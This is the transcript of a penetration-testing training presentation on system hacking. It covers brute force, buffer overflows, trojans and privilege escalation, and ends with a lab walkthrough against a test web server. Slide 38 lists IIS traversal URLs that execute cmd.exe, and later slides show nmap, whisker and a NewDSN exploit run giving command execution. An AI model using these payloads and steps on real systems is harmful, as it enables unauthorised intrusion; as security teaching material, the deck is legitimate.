System Hacking - PowerPoint PPT Presentation

About This Presentation
Title:

System Hacking

Description:

Explore the following security sites to identify what vulnerability information ... Normally blocked at routers due to broadcast. 8/3/09. Profile: Web ... – PowerPoint PPT presentation

Number of Views:1792
Avg rating:3.0/5.0
Slides: 102
Provided by: me690
Category:

less

Transcript and Presenter's Notes

Title: System Hacking


1
System Hacking
  • Section 4

2
Outline
  • Service identification
  • Vulnerability identification and research
  • Exploits
  • Putting it all together
  • Target selection in large networks
  • Using automated tools

3
Service Identification
  • Section 4.1

4
Service Identification
  • Common ports
  • Banners
  • Fingerprinting

5
Connecting to ports
  • Telnet or netcat is the best way to connect to
    ports
  • Many services may be accessed directly

6
Common ports
Many services can be identified by their common
port numbers
7
Zone-h.org
8
Alldas.de
9
Banners
  • Some services may be better identified by
    banners
  • telnet on routers (2001, 4001, 6001)
  • Web daemons for applications
  • Compaq Insight Manager
  • Many systems include web configuration interfaces

10
Banners
11
Fingerprinting
  • Some services cannot be clearly identified just
    by connecting the them
  • Netbus on NT uses the same port as an RPC service
    on Solaris
  • Some database connections do not provide
    automatic response
  • Fingerprinting a service may identify what it is,
    even if it has moved ports

12
Fingerprinting
13
Vulnerability Research
  • Section 4.2

14
Vulnerability identification and research
  • This is the process of mapping identified
    security attributes of a system or application to
    potential vulnerabilities
  • Several methods to map vulnerabilities
  • Manually map identified systems against publicly
    available database such as www.securityfocus.com,
    www.cert.org and vendor security alerts
  • Use public exploit code posted to various
    security mailing lists, hacker websites or write
    your own code
  • Use automated vulnerability scanning tools such
    as Nessus, ISS or whisker

15
Vulnerability research
16
Lab
  • Explore the following security sites to identify
    what vulnerability information would be of use to
    you for the services you have identified.
  • www.securityfocus.com
  • General searches on google.com
  • www.packetstormsecurity.com
  • www.astalavista.box.sk
  • www.securiteam.com
  • Time 30 minutes

17
Exploits
  • Section 4.3

18
Types of exploits
  • Remote exploits
  • Trojans
  • Privilege escalation

19
Remote Exploits
  • Section 4.3.1

20
Remote exploits
  • A remote exploit attempts to gain access across
    the network and without proper authentication.
  • Examples
  • Brute force authentication attempts
  • Attacks bypassing integrity checkers
  • Buffer overflows
  • Sniffing (to some extent)

21
Brute force attacks
  • Most common services attacked
  • Telnet
  • FTP
  • R commands
  • Secure Shell
  • SNMP community names
  • Post Office Protocol (POP)
  • HyperText Transport Protocol (HTTP/HTTPS)
  • SMB

22
Common Tools used
  • Brutus
  • Admsnmp
  • Admsmb
  • TeeNet
  • Pwscan.pl
  • Thc_hydra

23
Remote password guessing
  • Attempting to connect to an enumerated share such
    as (ADMIN and C) and trying username/password
    combinations until one works
  • A null session can be established with the
    target to obtain valid account names
  • Use an automated password guessing tool to brute
    force the selected shares.

24
Brute force attacks under Windows
  • Some common services prone to brute-force
  • Web
  • Netbios
  • FTP

25
(No Transcript)
26
Legion
27
Brute force attacks under Unix
  • Some common services prone to brute-force
  • telnet
  • Ssh
  • Web
  • FTP
  • R-commands

28
Lab
  • Use a Netbios scanning tool to identify local
    shares on this network
  • Use brute force tool to attempt access to an
    account on 10.0.1.120
  • Warning! These tools can produce significant
    traffic and lock accounts.
  • Time 30 minutes

29
Buffer overflow attacks
  • FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
  • LOUD-FAT-BLOKE
  • Stack overflows
  • Format string overflows
  • Heap overflows
  • Overflow subverting the control path

30
Buffer overflow attacks
  • FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
  • LOUD-FAT-BLOKE

31
Buffer overflow attacks
  • FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
  • LOUD-FAT-BLOKE
  • Occurs when a user or process attempts to place
    more data into a buffer than was originally
    allocated
  • Commonly associated with C functions like
    strcpy(), strcat(), sprintf() and etc
  • Most frequently found when user input is taken
    and passed into an application

32
Windows buffer overflows
  • Only a few conditions have been revealed to date
  • All of them exploited flaws in application
    programs
  • Very common for DoS attacks
  • Exploits
  • Netmeeting 2.x by Cult of the Dead Cow
  • NT RAS by Cerberus Information Security
  • Winhlp32 by Cerberus Information Security
  • IISHack by eEye
  • Oracle Web Listener 4.0 by CIS
  • Outlook GMT token overrun by Underground Security
    Systems Research
  • IIS .printer

33
Unix buffer overflows
  • Sadmind
  • ftp
  • Ssh
  • nfs

34
Unexpected input
  • Bypassing integrity checks
  • Gaining access by providing unexpected input
  • IIS unicode
  • Web applications

35
Format string attacks
  • Caused by programming errors in the formatted
    output family of functions, which includes
    printf() and sprintf()
  • Efforts usually focused on SUID root programs

36
Input validation attacks
  • Occurs when a program fails to recognise
    syntactically incorrect input
  • Occurs when a module accepts extraneous input
  • Occurs when a module fails to handle missing
    input fields
  • A field-value correlation error occurs
  • Common in web applications

37
IIS vulnerabilities
  • Unicode and URL based attacks
  • Special tags in HTTP
  • Sample scripts to brute force

38
IIS hacking
  • /scripts/root.exe?/cdir
  • /MSADC/root.exe?/cdir
  • /c/winnt/system32/cmd.exe?/cdir
  • /d/winnt/system32/cmd.exe?/cdir
  • /scripts/..255c../winnt/system32/cmd.exe?/cdir
  • /_vti_bin/..255c../..255c../..255c../winnt/syst
    em32/cmd.exe?/cdir
  • /_mem_bin/..255c../..255c../..255c../winnt/syst
    em32/cmd.exe?/cdir
  • /msadc/..255c../..255c../..255c/..c11c../..c
    11c../..c11c../winnt/system32/cmd.exe?/cdir
  • /scripts/..c11c../winnt/system32/cmd.exe?/cdir
  • /scripts/..c02f../winnt/system32/cmd.exe?/cdir
  • /scripts/..c0af../winnt/system32/cmd.exe?/cdir
  • /scripts/..c19c../winnt/system32/cmd.exe?/cdir
  • /scripts/..3563../winnt/system32/cmd.exe?/cdir
  • /scripts/..35c../winnt/system32/cmd.exe?/cdir
  • /scripts/..253563../winnt/system32/cmd.exe?/cd
    ir
  • /scripts/..252f../winnt/system32/cmd.exe?/cdir

39
Lab
  • Use the provided URLs to roam the filesystem of
    10.0.1.120
  • What is accessible and what is not?
  • Time 10 minutes

40
Trojan Horses and Backdoors
  • Section 4.3.2

41
Windows trojans and backdoors
  • These programs provide unauthorised access to a
    system without the users knowledge
  • Theef
  • CDC BackOrifice
  • SubSeven
  • Moosucker
  • A great site http//www.tlsecurity.net

42
Tlsecurity.net
43
Privilege Escalation
  • Section 4.3.3

44
Privilege escalation
  • Attack used to move from normal user to superuser
  • Quest for Administrator
  • Quest for root

45
Quest for Administrator
  • Hoovering information
  • Getadmin
  • Sechole
  • Spoofing LPC Port requests

46
Hoovering information
  • Identify further information that will gain
    higher privileges
  • Srvinfo
  • Find utility
  • regdmp

47
Getadmin
  • Windows NT 4
  • Small program written by Konstantin Sobolev
  • Adds users to the local admin group
  • Hijacks a process called winlogon
  • Patched by NT SP3

48
Sechole
  • Similar functionality to getadmin
  • Modifies instructions in the memory of the
    OpenProcess API
  • Possible to launch remotely if IIS is running
  • Patched by NT SP6a

49
Spoofing LPC Port Requests
  • Vulnerability identified by The RAZOR Team at
    http//razor.bindview.com
  • The code takes advantage of a flaw in one
    function of the Local Procedure Call (LPC) Ports
    API

50
Quest for root
  • Local buffer overflow
  • Symlink
  • File Descriptor attacks
  • Signal handling
  • Core-file manipulation
  • Shared libraries
  • Kernel flaws
  • System misconfiguration
  • IFS attacks

51
Local buffer overflow
  • Mostly used to exploit SUID root programs
  • May add username to password file

52
Sniffing
  • Section 4.3.4

53
Sniffing
  • Sniffing works by setting a network card to
    promiscuous mode
  • Sniffing only works on traffic travelling across
    the local network
  • Sniffing is greatly complicated by network switchs

54
Windows password sniffing
  • Can use any ordinary packet analyser
  • Or use a specialised tool such as l0phtcrack
  • Some susceptible services
  • Netbios
  • FTP
  • Web (especially cookies)

55
Windows password sniffing
56
Unix password sniffing
  • Can use any ordinary packet analyser
  • But Unix has some great sniffers such as dsniff
  • Many Unix programs send passwords in clear text
  • Some susceptible services
  • Telnet
  • FTP
  • Web

57
dsniff
  • Netbios
  • ftp
  • telnet
  • R-commands
  • http
  • Instant messenging
  • And much much more!

58
NT services
  • Section 4.4

59
Common NT services
60
Profile Netbios
  • Ports 135139
  • Susceptible to sniffing, brute force
  • Scanners available to search for shares
  • Can give access to system registry
  • Normally blocked at routers due to broadcast

61
Profile Web
  • Port 80, or any for special apps
  • Common servers Apache, Oracle, IIS, Cold Fusion
  • Very susceptible to DoS attacks
  • Often give read access to all files
  • IIS vulnerabilities are legendary

62
Profile SMTP
  • Port 25
  • Very susceptible to mail relay
  • Not a lot else

63
Profile FTP
  • Port21
  • Part of IIS distribution
  • Some vulnerabilities but not a large target

64
Profile databases
  • Ports 1433, 1510, 1725
  • MSSql is a good internal network target
  • MS and Oracle often set with default passwords
  • SQL injection a favourite for web hackers

65
Unix services
  • Section 4.5

66
Profile SNMP
  • Port 160, 161 UDP
  • SNMP has two default passwords public, private
  • Tools such as snmpwalk good for enumerating
    entries

67
Profile TFTP
  • Port 69
  • Typically used to boot diskless workstations or
    network devices such as routers
  • No username or password
  • Good for sending around files from hacked systems

68
Profile FTP
  • Ports 20, 21
  • Allows upload and download of files from a remote
    system
  • Many ftp server allow anonymous access
  • May be vulnerable to buffer overflow
  • Can also be used for bounce attacks

69
Profile Sendmail
  • Port 25
  • Mail transfer agent used on many Unix systems
  • Can be used to identify accounts via the vrfy and
    expn commands
  • Some version susceptible to denial of service and
    buffer overflows
  • Long list of vulnerabilities

70
Profile RPC
  • Remote Procedure Call
  • Allow a program on one computer to execute code
    on a remote system

71
Profile Web
  • Port 80
  • Apache is most common
  • Not as many attacks as IIS
  • Always check URLs for embedded commands

72
Identifying targets in large networks
  • Section 4.6

73
Target selection
  • Scan for specific services
  • Database (MS, Oracle, Sybase)
  • Web
  • RPC
  • R-commands
  • View Netbios browse lists to make way to
    PDC/server
  • View Netbios browse lists to identify treasury,
    etc

74
Automated vulnerability scanning tools
  • Section 4.8

75
Example automated applications
  • Grinder
  • SiteScan
  • Whisker
  • Twwscan
  • Nessus
  • Elza scriptable web client

76
whisker
77
Nessus
78
Conclusion
  • Hackers often search for specific known
    vulnerabilities and avoid well-secured systems
  • Free tools make it simple to gain unauthorised
    access to some systems
  • Tools such as Nessus should be used by every
    security professional

79
Putting it all together
  • Section 4.7

80
Our Configuration for today
For the purpose of the presentation, we will not
perform our tests over the internet But we wont
cheat by cutting out the firewall
Webserver Internal10.0.1.120 External10.0.0.120
TCP 80 only
Firewall 10.0.0.125 10.0.1.125
Router
81
Network Penetration Tests

82
Identifying firewall Strategy
  • Identify the Web or Mail server
  • Get the Next-Hop before this
  • This will probably be the perimeter router or the
    firewall
  • Firewall 1 NetScreen appear as a hop
  • PIX does not appear as a hop (flattens the
    network)
  • 80 chance that it will be NetScreen, PIX or
    Firewall 1
  • To figure out which
  • ICMP ( i.e. Address Mask Request Response
    headers)
  • Use TCP Stack finger printing
  • Key ports (258, 259 263 could be firewall 1)
  • IPSEC
  • BUT luckily these days the tools are pre-written

83
Identifying the Firewall - Traceroute
root_at_wireless root traceroute
10.0.0.120 traceroute to 10.0.0.120
(10.0.0.120) 30 hops max, 38 byte packets 1
2
UDP being blocked Need another tool
84
Identifying the Firewall - LFT
lft -vv E -n 10.0.0.120 Looks like we made
it. Everyone responded. Moving on... Will
finish TWO Concluding with 2 hops. TTL LFT
trace to 10.0.0.12080/tcp 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 1
target 10.0.0.12080 6.5ms 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 2
target 10.0.0.12080 1.6ms
Suggests something between us
A firewall perhaps
Could also use MPTraceroute
85
Accessible hosts sweep for the firewall
nmap -sP -n 10.0.0. Starting nmap V. 3.00 (
www.insecure.org/nmap/ ) Host (10.0.0.120)
appears to be up. Host (10.0.0.121) appears to
be down. Host (10.0.0.122) appears to be down.
Host (10.0.0.123) appears to be down. Host
(10.0.0.124) appears to be down. Host
(10.0.0.125) appears to be up. Host
(10.0.0.255) appears to be down. Nmap run
completed -- 256 IP addresses (2 hosts up)
scanned in 35 seconds
Our web server
Whos this
86
Identifying the perimeter Ike-scan
ike-scan -v 10.0.0.125 Starting ike-scan 1.6
with 1 hosts --- Pass 1 of 3 completed --- Pass
2 of 3 completed --- Pass 3 of 3 completed
Ending ike-scan 1.6 1 hosts scanned in 22.595
seconds (0.04 hosts/sec). 0 returned handshake
0 returned notify
87
Identifying the Firewall - conclusion
ping 10.0.0.120 PING 10.0.0.120 56(84)
bytes of data. 64 bytes from 10.0.0.120
icmp_seq1 ttl128 time0.280 ms --- 10.0.0.120
ping statistics --- 2 packets transmitted, 2
received, 0 loss ping -v -R 10.0.0.120
PING 10.0.0.120 56(124) bytes of data. ---
10.0.0.120 ping statistics --- 6 packets
transmitted, 0 received,100 loss
Windows !!
With low level Packet inspection I think not!!
88
Identifying the Firewall Icmp processing
ping -v -T tsandaddr 10.0.0.120 PING 10.0.0.120
(10.0.0.120) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.120 ping statistics --- 16
packets transmitted, 0 received, 100 loss
ping -v -T tsandaddr 10.0.0.125 PING 10.0.0.125
(10.0.0.125) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.125 ping statistics --- 8
packets transmitted, 0 received, 100 loss
89
Identifying the Firewall - Conclusion
  • We suspect there is a firewall
  • We know the web server is windows
  • But windows is not normally capable of
    manipulating packets to this extent
  • We are fairly sure that it isnt firewall 1
  • Lets see if we can hack into the servers

90
Hacking the other address - 10.0.0.125

91
Scanning 10.0.0.125
nmap -sS -n -p 1-10000 10.0.0.125 Starting
nmap 3.48 ( http//www.insecure.org/nmap/ ) All
10000 scanned ports on 10.0.0.125 are
filtered Nmap run completed -- 1 IP address (1
host up) nmap -sU -n -p 1-10000
10.0.0.125 Starting nmap 3.48 (
http//www.insecure.org/nmap/ ) All 10000
scanned ports on 10.0.0.125 are filtered Nmap
run completed -- 1 IP address (1 host up)
Nothing to hack
92
Hacking the web server

93
Hacking the web server
  • Scan TCP ports
  • Scan UDP ports
  • !!! Only HTTP or HTTPS ports should be visible
  • Run CGI scanner (I.e. Whisker, Crazymad or Nikto)
    to look for web server exploits
  • Check Scanner
  • Identify exploits

94
Hacking the web server Scan UDP ports
  • nmap -sU -n -p 1-10000 10.0.0.120
  • Starting nmap 3.48
  • All 10000 scanned ports on 10.0.0.120 are
    filtered
  • Nmap run completed -- 1 IP address (1 host up)
    scanned in 623.296 seconds

Nothing to hack
95
Hacking the web server Scan TCP ports
  • nmap -sS -n -O -p 1-1024 10.0.0.120
  • Interesting ports on 10.0.0.120
  • (The 1023 ports scanned but are filtered)
  • PORT STATE SERVICE
  • 80/tcp open http
  • Running (JUST GUESSING) Cisco pix os 6.X (88)
  • Aggressive OS guesses Cisco PIX 501 running 6.x
  • No exact OS matches for host.
  • Nmap completed -- 1 IP address (1 host up)

HTTP - The only Port to hack
Now we know
96
Hacking the web server Run CGI scanner
  • ./whisker.pl -h 10.0.0.120
  • -- whisker / v1.4.0 / rain forest puppy
  • Host 10.0.0.120
  • Server Microsoft-IIS/4.0
  • 200 OK (IDC error) GET /scripts/samples/details
    .idc
  • 200 OK (IDC error) GET /scripts/samples/ctguest
    b.idc
  • 200 OK HEAD /scripts/tools/newdsn.exe
  • this can be used to make DSNs, useful in use with
    our ODBC exploit
  • - and the RDS exploit (with msadcs.dll)
  • root_at_wireless v1.4 exit

97
Hacking the web server Analysing CGI scanner
results
98
Hacking the web server Analysing CGI scanner
results
99
Hacking the web server Analysing CGI scanner
results
100
Run exploit identified by scanner
  • dsnhackII.pl -c -h 10.0.0.120
  • NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
  • Checking for necessary files
  • Checking for newdsn.exe -- Found
    )
  • Checking for ctguestb.idc -- Found
    )
  • Checking for details.idc -- Found
    )
  • Now trying to create "Web SQL" DSN... ltsuccessgt
  • Initializing GuestBook by GETting ctguestb.idc
  • Type the command line you want to run (cmd /c
    assumed)
  • cmd /c dir gtgt ..\hamster
  • Now trying to execute command... ltsuccessgt
  • root_at_wireless root

101
Lab
  • Attack the systems provided and attempt to get
    command line access to NT
  • Time 45 minutes
Write a Comment
User Comments (0)
About PowerShow.com